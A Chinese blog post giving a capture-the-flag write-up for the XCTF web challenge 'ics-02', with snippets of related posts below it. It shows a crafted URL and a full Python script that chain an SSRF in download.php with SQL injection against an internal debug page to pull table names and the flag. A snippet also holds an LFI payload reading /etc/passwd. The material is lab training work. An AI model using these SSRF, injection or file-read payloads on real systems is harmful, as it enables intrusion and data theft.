攻防世界 WEB ics-02

最新推荐文章于 2023-06-21 15:19:19 发布
最新推荐文章于 2023-06-21 15:19:19 发布
阅读量249 收藏
点赞数
分类专栏: 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120580690
版权

web安全

考的是sql注入,结合之前的ics系列,肯定要从唯一有用的a链接入手,发现文档中心可以进入,点进去,又发现一个a链接

 <a href="download.php?dl=ssrf">paper. </a>

下下来download.php,打开可以发现pdf之类的头,那么就是个pdf,结合ssrf的提示,后面可能会有用
然后扫一波目录,发现/secrets目录
发现里面有secret_debug.php和secret.php两个文件,其中debug文件不能直接访问,那么ssrf大概就在这了,简单来说,就是你能访问有外部端口作为代理
来访问内网本来你访问不到的资源
先看一下做好的secret.php,进行注册,逻辑应该是insert
既然有debug页面,那么正常页面应该是不会有错的,分析一下大佬的脚本。。。
用download.php里面的ssrf漏洞去执行debug.php,尝试sql注入
s=3是待注入的目标页面
先自己手工注一下看下原理吧

http://111.200.241.244:50054/download.php?dl=http://127.0.0.1/secret/secret_debug.php?s=3%26txtfirst_name=1234'%26txtmiddle_name=1234%26txtname_suffix=asdf%26txtLast_name=asdf%26txtdob=12%26txtdl_nmbr=3%26txtRetypeDL=3%26a=3

这里从回显可以很明显的看出来存在sql注入,我在1234后面加了一个’于是在那里报错
注意%26 url解码是&;这是由前端浏览器自动做的,由于后端apache会再做一次编码转换,最后被转换为&
当然也可以直接写脚本一次编码,或者在burpsuite里面手动改包,看个人喜好
直接给一个大佬的脚本吧

import requests
import random
import urllib

url = 'http://111.200.241.244:50054/download.php'

# subquery = "database()"
# ssrfw
# subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1"
# cetcYssrf
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1"
# secretname -> flag
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1"
subquery = "select value from cetcYssrf LIMIT 1"

id = random.randint(1, 10000000)

d = ('http://127.0.0.1/secret/secret_debug.php?' +
        urllib.parse.urlencode({
            "s": "3",
            "txtfirst_name": "L','1',("+subquery+"),'1'/*",
            "txtmiddle_name": "m",
            "txtLast_name": "y",
            "txtname_suffix": "Esq.",
            "txtdob": "*/,'01/10/2021",
            "txtdl_nmbr": id,
            "txtRetypeDL": id,
            "btnContinue2":"Continue"
            })
)


r = requests.get(url, params={"dl": d})
print(d)
print(r)
print(r.text)

参考视频链接:https://www.bilibili.com/video/BV1Rq4y1P7V5/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1313
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
攻防世界ics-06(web进阶)
my_name_is_sy的博客
06-17 1125
关键技术是暴力破解。 点击来看一下嘛,给孩子凑个数据吧,拜托拜托! 内含详细的集体过程。
攻防世界 web高手进阶区 8分题 ics-02
闵行小鱼塘
10-04 596
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是ics-02的writeup
攻防世界web高手进阶之ics-02
花城的博客
09-23 314
攻防世界web高手进阶之ics-02结束语 进入文档中心页面,点击paper可以下载pdf文件,请求download.php,参数为dl pdf文件内容为ssrf,可能为线索 接着扫一遍目录,发现了/secret目录 访问一下试试 分别访问 看到私密页面1,查看元素,填完表提交,到达私密页面2,元素有一个变量s,s=3时返回页面2 发现secret_debug.php无法访问 到这里就无头绪了,wp大法,利用download.php传参进行ssrf攻击 虽然只能下载pdf文件,但是下载一个不存在
攻防世界--ics-02
qq_46263951的博客
01-06 1009
初始页面,看到这种页面就比较头疼,无从下手 先来扫下目录 download会让我们下载一个ssrf的pdf文件 secret目录下包含着secret.php和secret_debug.php login页面显示
【愚公系列】2023年06月 攻防世界-Webics-02
时光隧道
06-21 6944
SSRF(服务器端请求伪造)是一种攻击技术,攻击者通过构造恶意请求,欺骗服务器发起外部请求,获取服务器本应该不被直接访问的信息或服务。攻击者可利用 SSRF 进行一系列攻击,包括对内部资源进行扫描、窃取敏感信息、攻击内部系统等。SQL 注入是一种常见的 Web 攻击技术,攻击者通过在输入框等用户交互界面中注入 SQL 代码,进而控制数据库操作,例如读取、修改、删除等。攻击者可通过 SQL 注入进行窃取敏感信息、篡改数据,或直接攻击数据库服务器等。
[wp] 攻防世界 ics-02
MercyLin的博客
09-29 2881
进去扫目录发现/secret 无法直接进入secret_debug.php 显示ip不对 点paper会向download.php传参,可以下载一个ssrf内容的pdf, 于是想到利用ssrf来访问secret_debug.php 发现参数s,fuzz一下,发现s=3时会有如下返回 经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下: import requests impor...
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4566
尝试
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4603
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
xctf ics-02
weixin_51861515的博客
11-07 279
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
内网安全攻防(一)
YUKIDDDD的博客
08-01 1067
第1章 内网基础知识1.1 内网基础知识 1.1 内网基础知识 内网也指局域网,是指在某一区域内由多台计算机互连而成的计算机组 工作组 将不同的计算机按功能进行分组就产生了工作组的概念。 计算机可以随意加入或退出工作组 工作组里所有计算机都是对等的 工作组中的计算机可以互相共享资源 域(Domain) 域是一个有安全边界的计算机集合 域的安全管理机制更加严格,用户要访问域内的资源,必须以合法的身份登录域 用户对域内的资源权限取决于用户身份 单域 在一个域内,一般要有至少两台域服务器,一台作为
攻防世界Webics-05
Pai_Space
05-04 501
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 只能进入维护中心 要入侵系统,没有多余的信息,扫目录 没东西,那只能在原本页面找 源码中有个超链接 对应的是左上角的文字“云平台设备维护中心” 对应的 url,参数泄露 端口不给扫,先看看 ssh 开了没 ?page=php://filter/read=convert.base64-encode/resource=../../../../etc/passwd ssh 开了 用参数读页面源码,最下面..
攻防世界】学习记录-web(系数1 part2)
龟速更新的九某人
08-13 4406
攻防世界】学习记录-web(系数1 part2) 0482 weak_auth 0485 simple_php 0712 baby_web 1004 inget 1005 easyupload 1007 fileinclude 1008 very_easy_sql 1010 fileclude
攻防世界 web ics-06
Emjl__的博客
05-12 148
题目提示报表被删掉了只有一处留下了痕迹。本来第一时间想到检查服务器日志,但好像并不行。 打开题目,界面比较华丽但只有报表中心能点。进入报表中心,无论输入任何日期都没有反应。发现网址栏有 get 提交的 id=1,手撸几个数字没有反应,那就先尝试一下爆破。 先来50000个数尝试一下,只有在2333时长度不同。输入网址得到flag。 cyberpeace{6bc6badbdc5d04df2e423fb1b355e426} ...
攻防世界 WEB Background_Management_System
qq_41696858的博客
10-08 379
上一题smarty靶场好像有点问题,shell传上去连不上去,包括这一题好像也比原题少了些东西 先看看吧,这一题,老问题,注册,登录,发现没漏洞,扫目录,发现www.zip 源码审计,在application/index/controller/里面的UserInfo里面发现问题 $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' "; 前面注册登录页面都对转义字符做了过
攻防世界-web ics-05
m0_48108919的博客
02-19 2422
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 逐个点击菜单栏,发现只有设备维护中心有跳转 题目提示了利用后门入侵,首先使用dirsearch扫描网站目录,发现有个/index.php/login目录 尝试访问,发现页面有超链接,尝试点击 发现page的参数会原样输出 尝试使用php伪协议读取文件: php伪协议参考:https://www.cnblogs.com/endust/p/11804767.html 构造payload读取index.php..
攻防世界】一、baby_web
Hi~ 土拨鼠
01-20 771
步骤 首先我们使用bp进行抓包分析: 发现我们访问的页面是1.php页面,根据题目提示让我们找首页,我们修改访问路径为index.php进行访问: 在响应头中发现隐藏的flag! 考点 抓包软件的使用
工控攻防演示-从外网到内网设备的入侵
曲终人散
08-06 2663
· 一、 概述 1. 实验目的 通过工控靶场学习web渗透、内网渗透、工控安全相关知识技能。 2. 靶场信息 本实验通过vmware 搭建了靶场的外网和内网环境,在内网环境中,可以连接到真实的PLC进行漏洞利用。 靶场网络拓扑如下: 该网络环境中,有两台攻击机处于模拟外网中,分别是一台 windows7 主机和 kali 主机,通过这两台主机进行漏洞利用,获取内网访问权限,进一步获取西门子PLC的控制权,从而控制城市沙盘。 二、 演示过程 1. 资产发现 登录 kali 攻击机,输入 ifconfig 查
攻防世界ics-5wp
T19er的博客
07-10 2854
0x01 ics-5 浏览只有一个index页面,想到down源码,无果。 查看源代码发现有个page参数可以传值,利用LFI来查看源码。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php 读到base64加密的源码 PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNl...
攻防世界ics-06
最新发布
08-12
- *2* *3* [攻防世界Webics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值